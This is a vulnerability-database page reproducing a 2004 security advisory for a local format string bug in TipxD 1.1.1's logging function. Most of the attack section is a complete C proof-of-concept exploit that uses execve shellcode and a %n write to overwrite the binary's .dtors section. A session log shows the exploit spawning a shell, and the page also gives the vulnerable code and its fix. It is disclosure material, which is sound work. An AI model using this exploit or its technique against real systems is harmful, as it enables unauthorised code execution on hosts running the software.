Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

nsg-advisory-08.txt

🗓️ 20 Nov 2004 00:00:00Reported by CoKiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

TipxD has a local format string vulnerability in log function affecting versions 1.1.1 and prior.

Code
`-------------------------------------------------  
No System Group - Advisory #03 - 15/11/04  
-------------------------------------------------  
Program: Tom's IPX Tunneling Daemon - TipxD  
Homepage: http://tipxd.sourceforge.net  
Vulnerable Versions: TipxD 1.1.1 and prior  
Risk: Low  
Impact: Local Format String Vulnerability  
-------------------------------------------------  
  
  
- DESCRIPTION  
-------------------------------------------------  
tipxd is an IPX tunneling daemon which snoops on   
a local network for IPX 802.3 traffic, packages   
it and sends it over one or many TCP/IP connections   
to tipxd running on remote machines where it is   
unpacked and sent via the local network. To the   
IPX networks, it then appears that the LANs are   
joined. This is a request for testing and big-finding.   
It is intended for playing IPX based games where   
the remote machines are joined only by a TCP/IP   
network, and typically when the the gaming machines   
are each behind a firewall.  
  
More informations at: http://tipxd.sourceforge.net  
  
  
- DETAILS  
-------------------------------------------------  
tipxd is affected by a format string bug in the  
tipxd_log() function to 61 lines of src/log.c code:  
  
--- log.c ---  
45: void tipxd_log(int priority, char *format, ... )  
46: {  
47: va_list ap;  
48: char log_entry[LOG_ENTRY_SIZE];  
49:   
50: /* Take the format and variables and expand them out into a string,  
51: so that we can pass it on to syslog if necessary. No buffer overflow,  
52: aren't I good? :)  
53: */  
54: va_start(ap,format);  
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);  
56:   
57: if (sysinfo.opt_flags & OPT_STDERR) {  
58: /* To do: add something useful like timestamping instead of silly pre-identifie  
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);  
60: } else {  
61: syslog(priority,log_entry); // The format bug  
62: }  
63:  
64: return;  
65: }  
--- log.c ---  
  
We can show some parts of the stack memory by using a format string loke  
this:  
  
coki@servidor:~$ tipxd -C AAAA%08x  
Unable to open configuration file : No such file or directory  
  
coki@servidor:~$ tail -n 1 /var/log/messages  
Nov 15 11:03:40 servidor tipxd[8360]: Config file is AAAA0804c8d7  
coki@servidor:~$   
  
  
- EXPLOIT  
-------------------------------------------------  
  
------------------ tipxd_exp.c ------------------  
/* tipxd_exp.c  
  
TipxD Format String Vulnerability  
  
TipxD <= 1.1.1 local exploit (Proof of Concept)  
  
Tested in Slackware 9.0 / 9.1 / 10.0  
  
by CoKi <[email protected]>  
No System Group - http://www.nosystem.com.ar  
*/  
  
#include <stdio.h>  
#include <string.h>  
  
#define PATH "/bin/tipxd"  
#define OBJDUMP "/usr/bin/objdump"  
#define GREP "/usr/bin/grep"  
  
unsigned char shellcode[]= /* aleph1 shellcode.45b */  
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"  
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"  
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"  
"\x2f\x73\x68";  
  
int check(unsigned long addr);  
  
int main(int argc, char *argv[]) {  
  
int i, dtorsaddr;  
unsigned int bal1, bal2, bal3, bal4;  
char temp[512];  
char buffer[1024];  
char nop1[255], nop2[255];  
char nop3[255], nop4[255];  
int cn1, cn2, cn3, cn4;  
FILE *f;  
char *env[3] = {shellcode, NULL};  
int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);  
  
/* finding .dtors address */  
sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);  
f = popen(temp, "r");  
if(fscanf(f, " %08x", &dtorsaddr) != 1) {  
pclose(f);  
printf("Cannot find .dtors address\n");  
exit(1);  
}  
pclose(f);  
dtorsaddr = dtorsaddr + 4;  
  
printf("\n TipxD <= 1.1.1 local exploit (Proof of Concept)\n");  
printf(" by CoKi <[email protected]>\n\n");  
printf(" shellcode address = %.8p\n", shaddr);  
printf(" .dtors address = %.8p\n\n", dtorsaddr);  
  
bzero(temp, sizeof(temp));  
bzero(buffer, sizeof(buffer));  
  
strcat(buffer, "x");  
  
/* adding .dtors address */  
for(i = 0; i < 4; i++) {  
bzero(temp, sizeof(temp));  
sprintf(temp, "%s", &dtorsaddr);  
strncat(buffer, temp, 4);  
dtorsaddr++;  
}  
  
/* convert shellcode address location */  
memset(nop1, 0, 255);  
memset(nop2, 0, 255);  
memset(nop3, 0, 255);  
memset(nop4, 0, 255);  
  
bal1 = (shaddr & 0xff000000) >> 24;  
bal2 = (shaddr & 0x00ff0000) >> 16;  
bal3 = (shaddr & 0x0000ff00) >> 8;  
bal4 = (shaddr & 0x000000ff);  
  
cn1 = bal4 - 16 - 15 - 48 - 2 -1;  
cn1 = check(cn1);  
cn2 = bal3 - bal4 - 2;  
cn2 = check(cn2);  
cn3 = bal2 - bal3 - 2;  
cn3 = check(cn3);  
cn4 = bal1 - bal2 - 2;  
cn4 = check(cn4);  
  
memset(nop1, '\x90', cn1);  
memset(nop2, '\x90', cn2);  
memset(nop3, '\x90', cn3);  
memset(nop4, '\x90', cn4);  
  
sprintf(temp, "%%08x%%08x%%08x%%08x%%08x%%08x"  
"%s\xeb\x02%%n"  
"%s\xeb\x02%%n"  
"%s\xeb\x02%%n"  
"%s\xeb\x02%%n\x90\x90\x90\x90"  
,nop1, nop2, nop3, nop4);  
  
strcat(buffer, temp);  
  
execle(PATH, "tipxd", "-f", buffer, NULL, env);  
}  
  
int check(unsigned long addr) {  
char tmp[128];  
snprintf(tmp, sizeof(tmp), "%d", addr);  
if(atoi(tmp) < 1)  
addr = addr + 256;  
  
return addr;  
}  
  
---------------- cherokee_exp.c -----------------  
  
coki@servidor:~$ make tipxd_exp  
coki@servidor:~$ ./tipxd_exp  
  
tipxd local exploit (Proof of Concept)  
by CoKi <[email protected]>  
  
shellcode address = 0xbfffffa7  
.dtors address = 0x0804fbe0  
  
Unable to open configuration file : File name too long  
  
sh-2.05b$  
  
This exploit does not give a root shell :(  
  
  
- SOLUTIONS  
-------------------------------------------------  
Change the tipxd_log() function of src/log.c code:  
  
--- log.c ---  
45: void tipxd_log(int priority, char *format, ... )  
46: {  
47: va_list ap;  
48: char log_entry[LOG_ENTRY_SIZE];  
49:   
50: /* Take the format and variables and expand them out into a string,  
51: so that we can pass it on to syslog if necessary. No buffer overflow,  
52: aren't I good? :)  
53: */  
54: va_start(ap,format);  
55: vsnprintf(log_entry,LOG_ENTRY_SIZE-1,format,ap);  
56:   
57: if (sysinfo.opt_flags & OPT_STDERR) {  
58: /* To do: add something useful like timestamping instead of silly pre-identifie  
59: fprintf(stderr,"[TIPXD LOG] %s\n",log_entry);  
60: } else {  
61: syslog(priority,"%s",log_entry); // The fix  
62: }  
63:  
64: return;  
65: }  
--- log.c ---  
  
  
- REFERENCES  
-------------------------------------------------  
http://www.nosystem.com.ar/advisories/advisory-08.txt  
  
  
- CREDITS  
-------------------------------------------------  
Discovered by CoKi <[email protected]>  
  
No System Group - http://www.nosystem.com.ar`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Nov 2004 00:00Current
7.4High risk
Vulners AI Score7.4
tipxd vulnerabilitylocal format stringipx tunneling daemonlow riskversion 1.1.1
28